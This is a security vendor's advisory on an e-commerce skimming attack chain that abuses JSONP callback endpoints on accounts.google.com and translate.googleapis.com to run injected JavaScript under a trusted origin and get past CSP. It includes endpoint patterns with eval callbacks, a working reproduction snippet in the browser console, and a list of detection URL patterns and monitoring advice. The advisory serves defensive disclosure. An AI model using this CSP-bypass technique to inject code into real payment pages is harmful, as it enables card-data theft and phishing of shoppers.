by Source Defense
A sophisticated attack chain targeting e-commerce payment flows has been prematurely exposed in a concerning development, highlighting the delicate balance between responsible disclosure and public safety. Discovered initially by Source Defense’s research team and responsibly disclosed to Google on November 19, 2024 (Issue ID: 379818473), this critical vulnerability has now been publicly revealed by another vendor, potentially arming threat actors with a powerful new attack vector.
Breaking Development in Payment Security Landscape
Our research teams have uncovered a remarkably sophisticated attack chain that fundamentally changes how threat actors can abuse trusted infrastructure. This isn’t merely another Magecart variant – it represents a concerning evolution in how attackers can weaponize the trust mechanisms we rely upon for security.
The attack leverages an intricate series of trusted Google domain requests to execute malicious code while maintaining perfect camouflage. We’ve observed threat actors chaining requests through multiple endpoints:
accounts.google.com/o/oauth2/revoke?callback=
accounts.google.com/o/oauth2/eval
translate.googleapis.com/%24discovery/
translate.googleapis.com/$discovery/
This technique demonstrates unprecedented sophistication in bypassing traditional security controls:
- Trust Exploitation: Leverages Google’s domain reputation to bypass security filters
- Dynamic Execution: Chains multiple legitimate services to maintain persistence
- Stealth Mechanisms: Blends malicious activity with legitimate traffic patterns
Attack Overview
The attack begins with hackers injecting malicious JavaScript into a website. This can be achieved through two main methods:
- Direct Compromise: Hackers gain unauthorized access to the website’s source code, injecting the malicious script directly.
- Third-Party Service Exploitation: Hackers compromise a third-party service used by the website (e.g., analytics, chat widgets, or other external libraries) to inject the malicious script indirectly.
Once the script is injected, it points to a Google domain, leveraging a specific vulnerability to chain the malicious JavaScript into Google’s response. The attack appears to originate from a trusted Google domain, making it extremely difficult to detect and block.
Two examples of how this chain works:
- Using accounts.google.com domain:
bash
Copy code
accounts.google.com/o/oauth2/revoke?callback=eval(The Malicious JS) - Using translate.googleapis.com domain:
bash
Copy code
https://translate.googleapis.com/$discovery/rest?version=v3&callback=eval (The Malicious JS)
Why It Works:
When the injected script sends a request to Google, the response includes the malicious script, disguised as part of the legitimate Google domain. Due to the use of the eval() function in the response, the malicious code executes automatically on the page, enabling further attacks like data theft or user redirection.
Attack Impact:
This method allows hackers to circumvent critical security measures:
- Content Security Policy (CSP): Because the script appears to come from Google, CSP rules allowing Google domains are bypassed.
- Proxy-Based Detection: Proxies see the traffic as legitimate requests to Google and do not block them.
Further Exploitation:
Once the malicious script runs, it can redirect users to phishing sites, such as fake payment pages, to collect sensitive data.
Steps to Reproduce
- Open any website in a browser.
- Open the developer tools and navigate to the Console tab.
- Paste the following code:
var script = document.createElement(“script”);
script.src = “https://accounts.google.com/o/oauth2/revoke?callback=eval(alert(\”It seems like I came from Google, but I am not…\”))”;
document.head.appendChild(script); - Press Enter.
- Observe a JavaScript alert on the page.
- In the developer tools, go to the Network tab and locate the injected script. Its source domain will display as accounts.google.com.
This demonstrates how the script executes while appearing to originate from a trusted Google domain.
Images and Code Snippets
Source Code with the injected script to accounts.google.com:
Fake Stripe Payment Page on montina[.]it, hackers uses the injected script to redirect customer to this fake payment page.:
Current Threat Landscape: Active Exploitation Observed
As of November 18, 2024, our threat intelligence reveals active exploitation across multiple sectors. The attack infrastructure demonstrates remarkable adaptability, with compromised legitimate domains serving as hosts for sophisticated payment form injection attacks. We’ve observed:
- Dynamic script injection through trusted Google endpoints
- Real-time payment data exfiltration via fake payment form injection
- Advanced persistence through legitimate service abuse
- Sophisticated domain reputation abuse through service chaining
Critical Detection Patterns
Security teams must adapt their monitoring strategies to identify these emerging attack patterns. Key indicators include:
Script Behavior Anomalies
- Unexpected modifications to payment flows
- Dynamic script injection through Google service endpoints
- Unusual cross-domain communication patterns
Infrastructure Patterns
- Suspicious callback parameters to Google domains
- Unexpected eval() function calls through trusted endpoints
- Anomalous payment form modifications
Data Flow Indicators
- Unauthorized form field interactions
- Suspicious data exfiltration patterns
- Unexpected payment flow redirections
Current Protection Status for Source Defense Clients
Source Defense’s advanced protection system remains actively engaged in defending against this emerging threat vector. Our platform employs sophisticated real-time monitoring across all protected client pages, with particular focus on:
- Continuous analysis of outbound requests
- Real-time identification of potentially malicious code patterns
- Automated policy enforcement through blocking, reduction, or isolation
- Immediate threat containment through dynamic policy deployment
When suspicious activity is detected, our platform automatically implements appropriate protective measures, including script isolation, code blocking, or access reduction, ensuring continuous protection of client assets.
Guidance for Financial Institutions and Payment Processors
While Source Defense customers benefit from automated protection against this threat, all organizations processing payments should implement immediate monitoring for specific attack patterns. This attack vector demonstrates sophisticated abuse of trusted Google domains, requiring focused attention on specific URL patterns.
High-Priority Monitoring Targets
Monitor for unauthorized requests to the following Google service endpoints:
- https://accounts.google.com/o/oauth2/revoke?callback=eval(
- https://accounts.google.com/o/oauth2/eval(
- https://translate.googleapis.com/%24discovery/eval(
https://translate.googleapis.com/$discovery/eval(
These patterns represent active attack infrastructure leveraging trusted Google services for malicious code execution. While comprehensive request monitoring remains crucial for security, prioritizing these specific patterns enables efficient threat detection with minimal operational overhead.
Organizations should implement immediate logging and alerting for any requests matching these patterns, particularly within payment flows or sensitive transaction processes.
Understanding the Broader Impact
This development represents more than just another vulnerability – it signals a fundamental shift in how threat actors can abuse trusted infrastructure. The premature disclosure of these techniques creates an urgent need for adapted security measures across the e-commerce ecosystem.
The Changing Threat Landscape
- Traditional security controls are increasingly circumventable
- Trust-based security models require fundamental reassessment
- Real-time behavioral analysis becomes critical for defense
Moving Forward: Immediate Steps
Assess Current Exposure
- Audit all Google domain script usage
- Review payment page security architecture
- Evaluate current client-side security controls
Implement Protection Layers
- Deploy real-time monitoring solutions
- Enable script isolation capabilities
- Establish behavioral analysis baselines
Enhance Response Capabilities
- Update incident response procedures
- Prepare for potential compromise scenarios
- Enable rapid threat detection and response
Conclusion: A Call for Elevated Vigilance
The premature disclosure of this sophisticated attack chain creates immediate risk for organizations worldwide. While Source Defense continues to work with Google and our clients to address this threat, the broader security community must act quickly to implement protective measures.
Source Defense remains committed to responsible security research and disclosure. We will continue to provide updates and guidance as this situation evolves.
For immediate technical assistance or detailed implementation guidance, contact our security team. Source Defense stands ready to help organizations protect themselves against this emerging threat.
PCI DSS 4.0 makes client-side security a priority.
Source Defense delivers a solution for 6.4.3 and 11.6.1 without adding a burden to your security teams.
